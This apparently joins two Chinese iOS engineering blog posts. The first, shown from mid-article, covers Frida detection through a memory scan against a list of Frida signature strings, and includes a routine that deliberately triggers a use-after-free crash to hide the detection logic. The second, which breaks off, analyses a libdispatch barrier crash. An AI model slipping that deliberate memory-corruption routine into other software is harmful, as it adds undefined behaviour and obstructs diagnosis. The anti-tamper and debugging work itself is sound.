9 require("frida-objc-bridge"); Java / ObjC 方法解析,class 枚举,selector hook
10 /frida-core/lib/payload/spawn-monitor.vala 错误定位,日志,断言信息
11 FridaAgentRunner 负责启动 JS runtime,管理 lifecycle
12 FridaSpawnHandler 处理 spawn / attach 事件,与 server 协同
13 FridaPortalClient Agent RPC / IPC 客户端,与 frida-server 通信
14 FridaAgentController Agent 总控,管理模块、脚本、session
15 frida.Error. JS Error 类型,Native → JS 异常封装

(3)内存检测frida特征

检测函数 checkAppMemoryForFrida 的工作流程:

  1. 初始化
  • 获取当前进程 task,自地址 0 开始遍历虚拟内存区域。
  • 调用 init_self_image_range 记录自身镜像范围,后续跳过本进程主二进制区域。
  1. 遍历内存区域
  • 使用 vm_region_64 逐段获取区域起始地址、大小和保护属性。
  • 如果区域属于自身镜像则跳过;非 VM_PROT_READ 区域也跳过。
  1. 读取并扫描
  • 为区域大小分配缓冲区,vm_read_overwrite 读取该区域内容。
  • 遍历明文特征数组 kFridaPlainList(包含 Frida 相关字符串,如 frida_gadgetfrida/runtime/core.jsFridaAgentRunner 等),对每个特征调用 memory_contains 在该缓冲区内查找。
  1. 命中处理与日志
  • 如命中,hitCount++,并使用 dladdr 获取当前区域地址对应的模块路径,提取文件名,记录日志:
    • 内存检测到的特征
    • 地址(十六进制)
    • 模块名
    • hitCount
  1. 后续与回调
  • 释放缓冲区,继续下一个区域;若 vm_region_64 失败则结束循环。
  • 扫描结束:若 hitCount > 0 且传入了 onDetected,则执行回调;最后返回 hitCount
#include <string.h>
#include <stdio.h>
#include <mach/mach.h>
#include <mach-o/dyld.h>
#include <dlfcn.h>
#include <mach-o/dyld.h>
#include <mach-o/loader.h>
#include <sys/sysctl.h>
#include <unistd.h>
#include <stdbool.h>

static void *self_image_start = NULL;
static void *self_image_end   = NULL;

// 根据内存地址查找所属的模块名称(使用 dladdr)
static const char *find_module_for_address(vm_address_t addr) {
    Dl_info info;
    if (dladdr((void *)addr, &info)) {
        if (info.dli_fname) {
            return info.dli_fname;
        }
    }
    return "unknown";
}

// 日志文件相关
static NSString *ProtecToolLogFilePath(void) {
    static NSString *logPath = nil;
    static dispatch_once_t onceToken;
    dispatch_once(&onceToken, ^{
        NSArray<NSString *> *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
        NSString *docDir = paths.firstObject ?: NSTemporaryDirectory();
        logPath = [docDir stringByAppendingPathComponent:@"protec_log.txt"];
    });
    return logPath;
}

static void ProtecToolWriteLog(NSString *message) {
    if (message.length == 0) return;
    NSString *line = [message stringByAppendingString:@"\n"];
    NSData *data = [line dataUsingEncoding:NSUTF8StringEncoding];
    if (!data) return;

    NSString *path = ProtecToolLogFilePath();
    NSFileManager *fm = [NSFileManager defaultManager];
    if (![fm fileExistsAtPath:path]) {
        [data writeToFile:path atomically:YES];
    } else {
        NSFileHandle *fh = [NSFileHandle fileHandleForWritingAtPath:path];
        if (!fh) return;
        @try {
            [fh seekToEndOfFile];
            [fh writeData:data];
        } @catch (__unused NSException *e) {
        } @finally {
            [fh closeFile];
        }
    }
}

void ProtecToolClearLogFile(void) {
    NSString *path = ProtecToolLogFilePath();
    if (!path) return;
    NSFileManager *fm = [NSFileManager defaultManager];
    if ([fm fileExistsAtPath:path]) {
        [fm removeItemAtPath:path error:nil];
    }
}

NSString *ProtecToolReadLog(void) {
    NSString *path = ProtecToolLogFilePath();
    if (!path) return @"";
    NSError *error = nil;
    NSString *content = [NSString stringWithContentsOfFile:path encoding:NSUTF8StringEncoding error:&error];
    if (!content || error) {
        return @"";
    }
    return content;
}

#define PTLog(fmt, ...) do { \
    NSString *msg__ = [NSString stringWithFormat:(fmt), ##__VA_ARGS__]; \
    NSLog(@"%@", msg__); \
    ProtecToolWriteLog(msg__); \
} while(0)


static void init_self_image_range(void) {
    if (self_image_start) return;

    Dl_info info;
    if (!dladdr((void *)&init_self_image_range, &info))
        return;

    self_image_start = info.dli_fbase;

    for (uint32_t i = 0; i < _dyld_image_count(); i++) {
        if (_dyld_get_image_header(i) == info.dli_fbase) {
            const struct mach_header_64 *mh =
                (const struct mach_header_64 *)_dyld_get_image_header(i);
            intptr_t slide = _dyld_get_image_vmaddr_slide(i);

            uintptr_t maxEnd = 0;
            const struct load_command *cmd =
                (const struct load_command *)((uintptr_t)mh + sizeof(*mh));

            for (uint32_t j = 0; j < mh->ncmds; j++) {
                if (cmd->cmd == LC_SEGMENT_64) {
                    const struct segment_command_64 *seg =
                        (const struct segment_command_64 *)cmd;
                    uintptr_t end = seg->vmaddr + seg->vmsize;
                    if (end > maxEnd)
                        maxEnd = end;
                }
                cmd = (const struct load_command *)((uintptr_t)cmd + cmd->cmdsize);
            }

            self_image_end = (void *)(maxEnd + slide);
            break;
        }
    }
}

static const char *kFridaPlainList[] = {
    "frida_gadget",
    "/frida-core/lib/gadget/gadget.vala",
    "frida/runtime/core.js",
    "frida_agent_main",
    "frida_dylib_range=",
    "/frida-core/lib/agent/agent.vala",
    "frida:rpc",
    "Frida._loadObjC();",
    "require(\"frida-objc-bridge\");",
    "/frida-core/lib/payload/spawn-monitor.vala",
    "FridaAgentRunner",
    "FridaSpawnHandler",
    "FridaPortalClient",
    "FridaAgentController",
    "frida.Error."
};



// 内存扫描工具函数
static int memory_contains(const void *haystack, size_t haystack_len,
                           const void *needle, size_t needle_len) {
    if (needle_len == 0 || haystack_len < needle_len) return 0;

    const unsigned char *h = haystack;
    const unsigned char *n = needle;

    for (size_t i = 0; i <= haystack_len - needle_len; i++) {
        if (memcmp(h + i, n, needle_len) == 0)
            return 1;
    }
    return 0;
}

/*
 获取当前进程 task,初始化从地址 0 开始。
 用 vm_region_64 逐段枚举虚拟内存区域;失败即结束循环。
 只处理具有 VM_PROT_READ 权限的区域。
 为区域大小分配缓冲区,用 vm_read_overwrite 把该区域数据读入。
 逐个匹配 kFridaPlainList 中的明文关键字;命中则累加 hitCount。
 完成后继续下一个区域;循环结束时,如果命中且传入了 onDetected 回调,就执行它。
 返回总命中次数。
 */
int checkAppMemoryForFrida(void (*onDetected)(void)) {
    task_t task = mach_task_self();
    vm_address_t addr = 0;
    vm_size_t size = 0;

    int hitCount = 0;

    init_self_image_range();
    PTLog(@"内存检测--SELF IMAGE RANGE: %p - %p", self_image_start, self_image_end);
    while (1) {
        vm_region_basic_info_data_64_t info;
        mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64;
        mach_port_t object;

        kern_return_t kr = vm_region_64(
            task,
            &addr,
            &size,
            VM_REGION_BASIC_INFO_64,
            (vm_region_info_t)&info,
            &count,
            &object
        );

        if (kr != KERN_SUCCESS)
            break;
        

        if ((void *)addr >= self_image_start &&
            (void *)addr <  self_image_end) {
            addr += size;
            PTLog(@"内存检测--跳过app自身");
            continue;
        }

        // 只扫描可读内存
        if (info.protection & VM_PROT_READ) {
            void *buffer = malloc(size);
            if (buffer) {
                vm_size_t outSize = 0;
                if (vm_read_overwrite(task, addr, size,
                                      (vm_address_t)buffer,
                                      &outSize) == KERN_SUCCESS) {

                    for (size_t i = 0;
                         i < sizeof(kFridaPlainList)/sizeof(kFridaPlainList[0]);
                         i++) {

                        const char *needle = kFridaPlainList[i];
                        size_t needleLen = strlen(needle);
                        if (needleLen == 0) continue;

                        if (memory_contains(buffer, outSize,
                                            needle, needleLen)) {
                            hitCount++;
                            // 查找该内存地址所属的模块
                            const char *moduleName = find_module_for_address(addr);
                            // 提取模块名称(只显示文件名,不显示完整路径)
                            const char *moduleFileName = strrchr(moduleName, '/');
                            if (moduleFileName) {
                                moduleFileName++; // 跳过 '/'
                            } else {
                                moduleFileName = moduleName;
                            }
                            PTLog(@"内存检测--发现(%s), 地址:0x%llx, 模块:%s, hitCount=%d",
                                  needle, (unsigned long long)addr, moduleFileName, hitCount);
                        }
                    }
                }
                
                free(buffer);
            }
        }
        addr += size;
    }

    if (hitCount > 0 && onDetected) {
        PTLog(@"内存检测--执行--onDetected");
        onDetected();
    }
    PTLog(@"内存检测--返回--%d", hitCount);

    return hitCount;
}

当app被frida附加,检测frida特征输出信息:

内存检测--发现(FridaAgentRunner), 地址:0x100c1c000, 模块:unknown, hitCount=1
内存检测--发现(FridaSpawnHandler), 地址:0x100c1c000, 模块:unknown, hitCount=2
内存检测--发现(FridaPortalClient), 地址:0x100c1c000, 模块:unknown, hitCount=3
内存检测--发现(FridaAgentController), 地址:0x100c1c000, 模块:unknown, hitCount=4
内存检测--发现(frida.Error.), 地址:0x100c1c000, 模块:unknown, hitCount=5
内存检测--发现(frida.Error.), 地址:0x100c3c000, 模块:unknown, hitCount=6
内存检测--发现(frida_agent_main), 地址:0x10156c000, 模块:unknown, hitCount=7
内存检测--发现(frida_dylib_range=), 地址:0x10157c000, 模块:unknown, hitCount=8
内存检测--发现(require("frida-java-bridge")), 地址:0x101580000, 模块:unknown, hitCount=9
内存检测--发现(frida/runtime/core.js), 地址:0x101580000, 模块:unknown, hitCount=10
内存检测--发现(frida_dylib_range=), 地址:0x101580000, 模块:unknown, hitCount=11
内存检测--发现(/frida-core/lib/agent/agent.vala), 地址:0x101580000, 模块:unknown, hitCount=12
内存检测--发现(require("frida-objc-bridge");), 地址:0x101580000, 模块:unknown, hitCount=13内存检测--发现(FridaAgentRunner), 地址:0x101580000, 模块:unknown, hitCount=14
内存检测--发现(FridaSpawnHandler), 地址:0x101580000, 模块:unknown, hitCount=15
内存检测--发现(FridaPortalClient), 地址:0x101580000, 模块:unknown, hitCount=16
内存检测--发现(FridaAgentController), 地址:0x101580000, 模块:unknown, hitCount=17
内存检测--发现(frida.Error.), 地址:0x101580000, 模块:unknown, hitCount=18
内存检测--发现(frida_agent_main), 地址:0x102804000, 模块:unknown, hitCount=19

3、安全退出App并防止追踪

当检测到frida特征后,执行退出逻辑,并防止检测代码位置暴露,更好的保护检测逻辑,防止绕过。我们的退出代码需要切断「检测 → 退出」之间的可还原因果关系,让逆向者无法通过崩溃、堆栈、日志反推出检测代码。下面的代码可以很好的实现我们的需求。

void trigger_crash_async(void) {
    void *p = malloc(16);
    free(p);

    dispatch_async(dispatch_get_main_queue(), ^{
        CFRunLoopPerformBlock(CFRunLoopGetMain(),
                              kCFRunLoopCommonModes, ^{
            volatile char *q = (char *)p;
            q[0] = 0x42;
        });
    });
}

通过 Use-after-free + 异步调度 + RunLoop 执行,在时间、线程、调用栈和语义四个层面切断了“决策 → 崩溃”的因果关系,使崩溃在日志和运行期分析中高度拟态为真实工程 Bug,从而显著提高反追踪与反定位成本。 调用堆栈无法直接找到检测代码和崩溃位置:

Termination Signal: Bus error: 10
Termination Reason: Namespace SIGNAL, Code 0xa
Terminating Process: exc handler [9303]
Triggered by Thread:  0

Thread 0 name:  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0   libobjc.A.dylib                     0x00000001a82c4c98 objc_retain + 8
1   CoreFoundation                      0x0000000194abbf14 __NSSingleObjectArrayI_new + 84
2   CoreFoundation                      0x000000019496b334 -[NSArray initWithArray:range:copyItems:] + 412
3   UIKitCore                           0x00000001972cf714 _runAfterCACommitDeferredBlocks + 160
4   UIKitCore                           0x00000001972beb4c _cleanUpAfterCAFlushAndRunDeferredBlocks + 200
5   UIKitCore                           0x00000001972f0260 _afterCACommitHandler + 76
6   CoreFoundation                      0x00000001949ffecc __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 32
7   CoreFoundation                      0x00000001949fa5b0 __CFRunLoopDoObservers + 604
8   CoreFoundation                      0x00000001949faaf8 __CFRunLoopRun + 960
9   CoreFoundation                      0x00000001949fa200 CFRunLoopRunSpecific + 572
10  GraphicsServices                    0x00000001aaaf5598 GSEventRunModal + 160
11  UIKitCore                           0x00000001972c0004 -[UIApplication _run] + 1052
12  UIKitCore                           0x00000001972c55d8 UIApplicationMain + 164
13  TestSpace                           0x00000001046deb6c main + 184
14  libdyld.dylib                       0x00000001946d9598 start + 4

总结

任何单一检测手段都不可能对 Frida 实现“绝对防御”。在真实对抗场景中,Frida 的行为和特征本身也可以被刻意隐藏或篡改。因此,更合理的策略是将端口检测与内存特征检测进行组合使用,并配合多时机、多路径的触发机制,从而显著提高攻击成本和逆向复杂度。

Frida 防御的核心目标,是在可控的性能与稳定性成本下,尽早发现异常环境、干扰分析过程、并保护关键业务逻辑不被轻易理解和复现。希望本文的思路与实现方式,能为 iOS 开发与安全人员在实际项目中构建 Frida 对抗能力提供有价值的参考。

iOS疑难Crash-_dispatch_barrier_waiter_redirect_or_wake 崩溃治理

一. 背景

我们司机端App一直存在着_dispatch_barrier_waiter_redirect_or_wake相关的崩溃。

该崩溃具体崩溃堆栈如下:

// remark

Exception Type:  EXC_BREAKPOINT (SIGTRAP)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000001b0604ae0
Crashed Thread:  34


// 崩溃线程
Thread 34 Crashed:
0      libdispatch.dylib                     __dispatch_barrier_waiter_redirect_or_wake + 256
1      libdispatch.dylib                     __dispatch_lane_invoke + 764
2      libdispatch.dylib                     __dispatch_workloop_worker_thread + 648
3      libsystem_pthread.dylib               __pthread_wqthread + 288


==========

而且该崩溃集中在14.0~16.2之间的系统。

二. 原因排查

因为崩溃类型是EXC_BREAKPOINT (SIGTRAP)类型, 并且发生在 libdispatch.dylib(即 GCD,Grand Central Dispatch)内部函数中。

也就是说这是GCD内部检测到严重错误时主动产生的崩溃。

SIGTRAP崩溃类型主要是由于系统或运行时(Runtime)为了阻止程序在一种不安全的错误状态下继续执行而主动触发的“陷阱”,目的是为了方便开发者调试,常见原因:

  1. Swift 运行时安全机制触发(最常见):

    1. 强制解包 nil 可选值(! 操作符):如 var value = nilOptional!
    2. 强制类型转换失败(as! 操作符):尝试将对象转换为不兼容类型。
    3. Swift 检测到数组越界、整数溢出等内存安全问题时会主动触发 EXC_BREAKPOINT/SIGTRAP
  2. 底层库的不可恢复错误:

  • GCDlibdispatch)等系统库在检测到内部状态异常(如队列死锁、资源竞争)时可能触发 SIGTRAP,比如dispatch_group_tenter/leave不匹配。

因为崩溃堆栈崩溃在__dispatch_barrier_waiter_redirect_or_wake + 256

0      libdispatch.dylib                     __dispatch_barrier_waiter_redirect_or_wake + 256
1      libdispatch.dylib                     __dispatch_lane_invoke + 764
2      libdispatch.dylib                     __dispatch_workloop_worker_thread + 648
3      libsystem_pthread.dylib               __pthread_wqthread + 288

因此我们找一台iOS14-iOS16系统的真机,然后运行在release环境,查看下256指令对应的代码。

libdispatch.dylib`_dispatch_barrier_waiter_redirect_or_wake:
->  0x10c4f49f0 <+0>:   pacibsp 
    0x10c4f49f4 <+4>:   stp    x24, x23, [sp, #-0x40]!
    0x10c4f49f8 <+8>:   stp    x22, x21, [sp, #0x10]
    0x10c4f49fc <+12>:  stp    x20, x19, [sp, #0x20]
    0x10c4f4a00 <+16>:  stp    x29, x30, [sp, #0x30]
    0x10c4f4a04 <+20>:  add    x29, sp, #0x30
    0x10c4f4a08 <+24>:  mov    x22, x4
    0x10c4f4a0c <+28>:  mov    x20, x3
    0x10c4f4a10 <+32>:  mov    x19, x1
    0x10c4f4a14 <+36>:  mov    x21, x0
    0x10c4f4a18 <+40>:  ldr    x8, [x1, #0x30]
    0x10c4f4a1c <+44>:  cmn    x8, #0x4
    0x10c4f4a20 <+48>:  b.ne   0x10c4f4a38               ; <+72>
    0x10c4f4a24 <+52>:  ldrb   w9, [x19, #0x69]
    0x10c4f4a28 <+56>:  ubfx   x8, x20, #32, #3
    0x10c4f4a2c <+60>:  cmp    w8, w9
    0x10c4f4a30 <+64>:  b.ls   0x10c4f4a38               ; <+72>
    0x10c4f4a34 <+68>:  strb   w8, [x19, #0x69]
    0x10c4f4a38 <+72>:  tbnz   x20, #0x25, 0x10c4f4a78   ; <+136>
    0x10c4f4a3c <+76>:  mvn    x8, x20
    0x10c4f4a40 <+80>:  tst    x8, #0x1800000000
    0x10c4f4a44 <+84>:  b.ne   0x10c4f4a6c               ; <+124>
    0x10c4f4a48 <+88>:  ubfx   x9, x20, #32, #3
    0x10c4f4a4c <+92>:  mrs    x8, TPIDRRO_EL0
    0x10c4f4a50 <+96>:  ldr    w10, [x8, #0xc8]
    0x10c4f4a54 <+100>: ubfx   w11, w10, #16, #4
    0x10c4f4a58 <+104>: cmp    w11, w9
    0x10c4f4a5c <+108>: b.hs   0x10c4f4a6c               ; <+124>
    0x10c4f4a60 <+112>: and    w10, w10, #0xfff0ffff
    0x10c4f4a64 <+116>: bfi    w10, w9, #16, #3
    0x10c4f4a68 <+120>: str    x10, [x8, #0xc8]
    0x10c4f4a6c <+124>: mov    x23, #-0x4                ; =-4 
    0x10c4f4a70 <+128>: tbnz   w2, #0x0, 0x10c4f4ad8     ; <+232>
    0x10c4f4a74 <+132>: b      0x10c4f4b68               ; <+376>
    0x10c4f4a78 <+136>: tbnz   w2, #0x0, 0x10c4f4ad0     ; <+224>
    0x10c4f4a7c <+140>: tbz    w20, #0x0, 0x10c4f4b64    ; <+372>
    0x10c4f4a80 <+144>: mov    x23, x21
    0x10c4f4a84 <+148>: tbnz   w22, #0x0, 0x10c4f4b68    ; <+376>
    0x10c4f4a88 <+152>: ldr    w8, [x21, #0x8]
    0x10c4f4a8c <+156>: mov    w9, #0x7fffffff           ; =2147483647 
    0x10c4f4a90 <+160>: cmp    w8, w9
    0x10c4f4a94 <+164>: b.eq   0x10c4f4b64               ; <+372>
    0x10c4f4a98 <+168>: add    x8, x21, #0x8
    0x10c4f4a9c <+172>: mov    w9, #-0x1                 ; =-1 
    0x10c4f4aa0 <+176>: ldaddl w9, w8, [x8]
    0x10c4f4aa4 <+180>: mov    x23, x21
    0x10c4f4aa8 <+184>: cmp    w8, #0x0
    0x10c4f4aac <+188>: b.gt   0x10c4f4b68               ; <+376>
    0x10c4f4ab0 <+192>: stp    x20, x21, [sp, #-0x10]!
    0x10c4f4ab4 <+196>: adrp   x20, 47
    0x10c4f4ab8 <+200>: add    x20, x20, #0x95e          ; "API MISUSE: Over-release of an object"
    0x10c4f4abc <+204>: adrp   x21, 81
    0x10c4f4ac0 <+208>: add    x21, x21, #0x260          ; gCRAnnotations
    0x10c4f4ac4 <+212>: str    x20, [x21, #0x8]
    0x10c4f4ac8 <+216>: ldp    x20, x21, [sp], #0x10
    0x10c4f4acc <+220>: brk    #0x1
    0x10c4f4ad0 <+224>: mov    x23, x21
    0x10c4f4ad4 <+228>: tbnz   w22, #0x0, 0x10c4f4b1c    ; <+300>
    0x10c4f4ad8 <+232>: ldr    w8, [x21, #0x8]
    0x10c4f4adc <+236>: mov    w9, #0x7fffffff           ; =2147483647 
    0x10c4f4ae0 <+240>: cmp    w8, w9
    0x10c4f4ae4 <+244>: b.eq   0x10c4f4b68               ; <+376>
    0x10c4f4ae8 <+248>: add    x8, x21, #0x8
    0x10c4f4aec <+252>: mov    w9, #-0x2                 ; =-2 
    0x10c4f4af0 <+256>: ldaddl w9, w8, [x8]
    0x10c4f4af4 <+260>: cmp    w8, #0x1
    0x10c4f4af8 <+264>: b.gt   0x10c4f4b68               ; <+376>
    0x10c4f4afc <+268>: stp    x20, x21, [sp, #-0x10]!
    0x10c4f4b00 <+272>: adrp   x20, 47
    0x10c4f4b04 <+276>: add    x20, x20, #0x95e          ; "API MISUSE: Over-release of an object"
    0x10c4f4b08 <+280>: adrp   x21, 81
    0x10c4f4b0c <+284>: add    x21, x21, #0x260          ; gCRAnnotations
    0x10c4f4b10 <+288>: str    x20, [x21, #0x8]
    0x10c4f4b14 <+292>: ldp    x20, x21, [sp], #0x10

我们结合iOS14-iOS16对应的libdispatch源码里面_dispatch_barrier_waiter_redirect_or_wake函数

DISPATCH_NOINLINE
static void
_dispatch_barrier_waiter_redirect_or_wake(dispatch_queue_class_t dqu,
                dispatch_object_t dc, dispatch_wakeup_flags_t flags,
                uint64_t old_state, uint64_t new_state)
{
        dispatch_sync_context_t dsc = (dispatch_sync_context_t)dc._dc;
        dispatch_queue_t dq = dqu._dq;
        dispatch_wlh_t wlh = DISPATCH_WLH_ANON;

        if (dsc->dc_data == DISPATCH_WLH_ANON) {
                if (dsc->dsc_override_qos < _dq_state_max_qos(old_state)) {
                        dsc->dsc_override_qos = (uint8_t)_dq_state_max_qos(old_state);
                }
        }

        if (_dq_state_is_base_wlh(old_state)) {
                wlh = (dispatch_wlh_t)dq;
        } else if (_dq_state_received_override(old_state)) {
                // Ensure that the root queue sees that this thread was overridden.
                _dispatch_set_basepri_override_qos(_dq_state_max_qos(old_state));
        }

        if (flags & DISPATCH_WAKEUP_CONSUME_2) {
                if (_dq_state_is_base_wlh(old_state) &&
                                _dq_state_is_enqueued_on_target(new_state)) {
                        // If the thread request still exists, we need to leave it a +1
                        _dispatch_release_no_dispose(dq);
                } else {
                        _dispatch_release_2_no_dispose(dq);
                }
        } else if (_dq_state_is_base_wlh(old_state) &&
                        _dq_state_is_enqueued_on_target(old_state) &&
                        !_dq_state_is_enqueued_on_target(new_state)) {
                // If we cleared the enqueued bit, we're about to destroy the workloop
                // thread request, and we need to consume its +1.
                _dispatch_release_no_dispose(dq);
        }

        //
        // Past this point we are borrowing the reference of the sync waiter
        //
        if (unlikely(_dq_state_is_inner_queue(old_state))) {
                dispatch_queue_t tq = dq->do_targetq;
                if (dsc->dc_flags & DC_FLAG_ASYNC_AND_WAIT) {
                        _dispatch_async_waiter_update(dsc, dq);
                }
                if (likely(tq->dq_width == 1)) {
                        dsc->dc_flags |= DC_FLAG_BARRIER;
                } else {
                        dispatch_lane_t dl = upcast(tq)._dl;
                        dsc->dc_flags &= ~DC_FLAG_BARRIER;
                        if (_dispatch_queue_try_reserve_sync_width(dl)) {
                                return _dispatch_non_barrier_waiter_redirect_or_wake(dl, dc);
                        }
                }
                // passing the QoS of `dq` helps pushing on low priority waiters with
                // legacy workloops.
#if DISPATCH_INTROSPECTION
                dsc->dsc_from_async = false;
#endif
                return dx_push(tq, dsc, _dq_state_max_qos(old_state));
        }

        if (dsc->dc_flags & DC_FLAG_ASYNC_AND_WAIT) {
                // _dispatch_async_and_wait_f_slow() expects dc_other to be the
                // bottom queue of the graph
                dsc->dc_other = dq;
        }
#if DISPATCH_INTROSPECTION
        if (dsc->dsc_from_async) {
                _dispatch_trace_runtime_event(async_sync_handoff, dq, 0);
        } else {
                _dispatch_trace_runtime_event(sync_sync_handoff, dq, 0);
        }
#endif // DISPATCH_INTROSPECTION
        return _dispatch_waiter_wake(dsc, wlh, old_state, new_state);
}
static inline void
_dispatch_release_2_no_dispose(dispatch_object_t dou)
{
        _os_object_release_internal_n_no_dispose_inline(dou._os_obj, 2);
}
DISPATCH_ALWAYS_INLINE
static inline void
_os_object_release_internal_n_no_dispose_inline(_os_object_t obj, int n)
{
        int ref_cnt = _os_object_refcnt_sub(obj, n);
        if (likely(ref_cnt >= 0)) {
                return;
        }
        _OS_OBJECT_CLIENT_CRASH("Over-release of an object");
}
#define _os_object_refcnt_sub(o, n) \
                _os_atomic_refcnt_sub2o(o, os_obj_ref_cnt, n)
#define _os_atomic_refcnt_sub2o(o, m, n) \
                _os_atomic_refcnt_perform2o(o, m, sub, n, release)
#define _os_atomic_refcnt_perform2o(o, f, op, n, m)   ({ \
                typeof(o) _o = (o); \
                int _ref_cnt = _o->f; \
                if (likely(_ref_cnt != _OS_OBJECT_GLOBAL_REFCNT)) { \
                        _ref_cnt = os_atomic_##op##2o(_o, f, n, m); \
                } \
                _ref_cnt; \
        })

分析256汇编指令的前后的逻辑

0x10c4f4ad8 <+232>: ldr w8, [x21, #0x8] ; 从x21+0x8处加载一个32位值到w8(即读取引用计数值)

0x10c4f4adc <+236>: mov w9, #0x7fffffff ; 将最大值0x7FFFFFFF放入w9

0x10c4f4ae0 <+240>: cmp w8, w9 ; 比较引用计数值是否等于0x7FFFFFFF

0x10c4f4ae4 <+244>: b.eq 0x10c4f4b68 ; 如果相等,跳转到正常退出(说明是全局引用计数,不需要减)

0x10c4f4ae8 <+248>: add x8, x21, #0x8 ; 将x21+8的地址存入x8(引用计数字段地址)

0x10c4f4aec <+252>: mov w9, #-0x2 ; 将-2存入w9

0x10c4f4af0 <+256>: ldaddl w9, w8, [x8] ; 原子操作:将[x8]的值加上w9(即减2),并将操作前的值存入w8

0x10c4f4af4 <+260>: cmp w8, #0x1 ; 比较操作前的值(w8)是否大于1

0x10c4f4af8 <+264>: b.gt 0x10c4f4b68 ; 如果大于1,跳转到正常退出

0x10c4f4afc <+268>: ... 后续是处理引用计数不足的情况,会触发崩溃

注意,在 ldaddl 指令之前,有两条指令:

  • ldr w8, [x21, #0x8]:从 x21+8 处读取值。这里 x21 指向的是 obj(即队列对象),而 os_obj_ref_cnt 字段在对象结构体中的偏移量是8(因为对象结构体第一个字段是isa指针,占8字节,第二个字段就是引用计数)。所以这个读取是正常的。
  • 然后检查这个值是否为 0x7fffffff(全局引用计数),如果是,则跳过减操作。

如果引用计数不是全局引用计数,则计算引用计数字段地址(x21+8)x8,然后执行原子减操作。

崩溃发生在 ldaddl 指令,说明在访问 x8 指向的内存时出现了问题。而 x8 的值是 x21+8,所以问题可能在于 x21 指向的对象已经无效。

因此,最可能的情况是:x21 指向的队列对象(dq)已经被释放了,所以它指向的内存地址无效。

那为什么这个崩溃只出现在iOS14.0~16.2之间的系统?

这个问题我并没有找到确定的答案,在苹果开发者论坛以及相关资料也没有找到相关的讨论帖子

以下只是我针对我所掌握资料的一些原因推测。

因为iOS14.0~16.2系统发布的时间大概2020年 - 2022年之间,因此我找了下这期间libdispatch版本libdispatch-1271.100.5(2021年发布)

libdispatch版本: github.com/apple-oss-d…

来跟iOS16.2之后的版本libdispatch-1462.0.4,也是2023年发布的版本做对比。

通过分析__dispatch_barrier_waiter_redirect_or_wake函数实现以及256指令对应的汇编代码指向的是引用计数函数减2的函数,我们可以确定256指令对应函数代码实现是_dispatch_release_2_no_dispose

然后将_dispatch_release_2_no_dispose相关的上下游函数做对比,发现最有可能的根本原因:

iOS14.0~16.2之间引用计数器操作的方法,存在多线程操作情况,导致引用计数器提前为0,导致队列提前释放问题。具体表现为:

  • 引用技术的读取是非原子操作,不是线程安全的,只有操作(加减)是线程安全的,
  • 这样当多个线程同时操作同一个对象的引用计数时,可能出现数据竞争
  • 比如在多线程环境中,线程 A 正在更新引用计数,比如将引用计数加1,线程 B 同时读取,B 可能读到一个不完整的中间值,比如最开始引用计数是5,线程A更新后应该为6,线程B正确读取到的应该是6,但由于读操作的同时,线程A的更新操作还没结束,导致读取到的还是5.
  • 这样引用计数就会存在不准确问题,导致了有可能引用计数提前为0,导致队列被提前释放。
#define _os_atomic_refcnt_perform2o(o, f, op, n, m)   ({ \
                __typeof__(o) _o = (o); \
                int _ref_cnt = _o->f; \
                if (likely(_ref_cnt != _OS_OBJECT_GLOBAL_REFCNT)) { \
                        _ref_cnt = os_atomic_##op##2o(_o, f, n, m); \
                } \
                _ref_cnt; \
        })

我们看下测试的代码就很直观

而在libdispatch-1462.0.4版本里面,引用计数的操作就保证了读取和写入都是原子性,都是线程安全的。

#define _os_atomic_refcnt_perform(o, op, n, m)   ({ \
                int _ref_cnt = os_atomic_load(o, relaxed); \
                if (likely(_ref_cnt != _OS_OBJECT_GLOBAL_REFCNT)) { \
                        _ref_cnt = os_atomic_##op(o, n, m); \
                } \
                _ref_cnt; \
        })

因此也就保证了队列不会被提前释放。

我们比对了所有版本的libdispatch源码,发现引用计数操作的读取和写入都是原子性的,最早是在libdispatch-1462.0.4这个版本改的,但libdispatch-1462.0.4的发布时间已经是2023.09, 这时候对应的系统版本应该已经是iOS17,但考虑到libdispatch源码的公布,一般都是晚于iOS系统版本,等系统版本稳定后,才发布,因此可以合理的猜测其实苹果在iOS16.3系统版本里面就修复了这个引用计数操作问题。

以上我们推测了为什么这个崩溃会发生在iOS14.0~16.2系统,以及引起崩溃的可能原因是因为队列被提前释放了。

__dispatch_barrier_waiter_redirect_or_wake则表明这个崩溃发生在 GCDbarrier 同步机制 中,具体是系统在处理 dispatch_barrier_asyncdispatch_barrier_sync 时,尝试唤醒等待 barrier 的线程,但访问了已经释放的队列对象。

因此我们将目标锁定在 GCD 处理 barrier(栅栏)任务的方法调用上,也就是dispatch_barrier_syncqueue.sync(flags: .barrier)或者dispatch_barrier_asyncqueue.async(flags: .barrier)的调用上。

排查发现项目中有太多的地方调用到队列的栅栏函数,无论是二方、三方库、还是业务侧都有挺多地方调用到。

因为二方、三方库,除了我们业务线外,还有公司内其他业务线也在使用,因此咨询了其他业务线的iOS开发人员,发现他们并没有类似的崩溃。那也就是说二方、三方库引起的概率很小,很大概率是我们业务侧对barrier(栅栏)方法的使用引起的,因此我们也缩小了排查范围。

既然目标是业务侧对barrier(栅栏)方法的使用,经排查我们发现,业务侧定义了很多安全类比如安全字典、安全数组等,里面都是通过并行队列的同步读和栅栏函数写来实现读写锁的逻辑。

类似逻辑如下:

虽然我们观察代码的相关逻辑,发现这些安全类的读写锁逻辑,从代码结构来说确实没什么问题。但因为这些类在业务侧中有着非常广泛的使用,有作为对象的变量,也有作为局部变量,而且很多变量都是在多线程情况下生成和释放等操作,因此怀疑很有可能是这些安全类里面的并行队列的读写锁逻辑,导致系统内部由于引用技术操作的非原子性,致使并行队列引用计数为0,提前被释放,访问到无效内存地址崩溃。

三. 解决方案

既然原因锁定在这些安全类里面的通过并行队列来实现的读写锁逻辑,那最好的解决方案就是替换掉这些安全类里面的读写锁逻辑,使用pthread_rwlock_t来代替并行队列实现读写锁功能, 这样就避免了队列提前释放的风险。

读写锁pthread_rwlock_t其内部可能包含如下组件:

  • 互斥锁(Mutex) :用于保护读写锁的内部状态,如读计数器和写锁状态。
  • 读计数器(Read Counter) :记录当前持有读锁的线程数量。
